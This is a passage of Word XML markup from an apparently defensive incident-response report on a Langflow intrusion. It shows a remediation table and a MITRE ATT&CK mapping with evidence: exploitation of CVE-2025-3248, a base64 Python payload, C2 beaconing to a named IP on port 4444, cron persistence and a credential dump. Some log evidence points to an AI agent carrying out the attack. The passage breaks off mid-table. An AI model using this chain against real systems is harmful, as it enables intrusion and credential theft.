              <w:t xml:space="preserve">Informational</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="450" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6BD735EA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">12</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3150" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="40F1EC89">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">langflow service account had enough privilege to dump its own credential store, write crontab entries, and pivot to other hosts</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="3850" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="65F8BF73">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Reduce the langflow service account to least privilege: no crontab access, no reason to reach MinIO, MySQL, or Nacos directly except through the specific integrations it needs.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="900" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6F4EF3BD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3B585376">
      <w:pPr>
        <w:pStyle w:val="706"/>
        <w:pBdr/>
        <w:spacing w:after="120" w:before="300"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">MITRE ATT&amp;CK Mapping</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:p w14:paraId="035B39D3">
      <w:pPr>
        <w:pBdr/>
        <w:spacing w:after="160"/>
        <w:ind/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Fifteen techniques observed across the intrusion, mapped to the specific evidence collected during the hunt. Ordered by when each occurred in the attack chain.</w:t>
      </w:r>
      <w:r/>
      <w:r/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="93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520"/>
        <w:gridCol w:w="960"/>
        <w:gridCol w:w="2080"/>
        <w:gridCol w:w="4820"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="083FCB95">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Tactic</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="2BDB08BD">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Technique</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="232687E7">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Name</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="1f3864"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="12CDB91B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="ffffff"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Evidence</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="77E46382">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Initial Access</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="427F30A0">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1190</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="0992A28D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit Public-Facing Application</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5A190541">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthenticated POST to /api/v1/validate/code on ff-lf-01 from 64.20.53.230, exploiting CVE-2025-3248 (Python default-argument evaluation) in Langflow. Syslog, 19:20:00; LLMAgentLogs_CL agent reasoning names the CVE, 19:20:01.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="41525059">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Execution</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5031A7CA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1059.006</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="569B7F10">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Scripting Interpreter: Python</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1E132EE3">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Langflow service process (PID 3201) spawns python3.11 (PID 4471) running python3 -c &lt;base64 payload&gt;, four seconds after the exploit request. LinuxProcess_CL, 19:20:04.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="79866A1D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Command and Control</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4D64C817">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1571</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="08C5D3B6">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Non-Standard Port</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="5D47B0BA">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Compromised process beacons to 45.131.66.106 on port 4444, the only destination in the environment on a non-standard port. Syslog and LinuxNetwork_CL, 19:22:04.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="6BE496ED">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Persistence</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1087B885">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1053.003</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="330D05BE">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Scheduled Task/Job: Cron</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="276CBB42">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Crontab entry installed for the langflow account, schedule */30 * * * *, re-pulling and executing the C2 payload every 30 minutes. LinuxAudit_CL CONFIG_CHANGE, 19:35:54.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="3A69976D">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="1375749B">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">T1552 / T1555</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="2080" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="7BE202B5">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Unsecured Credentials / Credentials from Password Stores</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="4820" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="4B56126F">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Langflow's own local Postgres backend dumped via pg_dump, yielding 214 secrets across 8 provider families plus database logins and crypto wallets. LLMAgentLogs_CL, 19:25:04 and 19:25:13.</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="1520" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
          <w:p w14:paraId="394D1065">
            <w:pPr>
              <w:pBdr/>
              <w:spacing/>
              <w:ind/>
              <w:rPr/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">Credential Access</w:t>
            </w:r>
            <w:r/>
            <w:r/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:shd w:val="clear" w:color="ffffff" w:fill="eef2f7"/>
            <w:tcBorders/>
            <w:tcMar>
              <w:left w:w="100" w:type="dxa"/>
              <w:top w:w="80" w:type="dxa"/>
              <w:right w:w="100" w:type="dxa"/>
              <w:bottom w:w="80" w:type="dxa"/>
            </w:tcMar>
            <w:tcW w:w="960" w:type="dxa"/>
            <w:textDirection w:val="lrTb"/>
            <w:noWrap w:val="false"/>
          </w:tcPr>
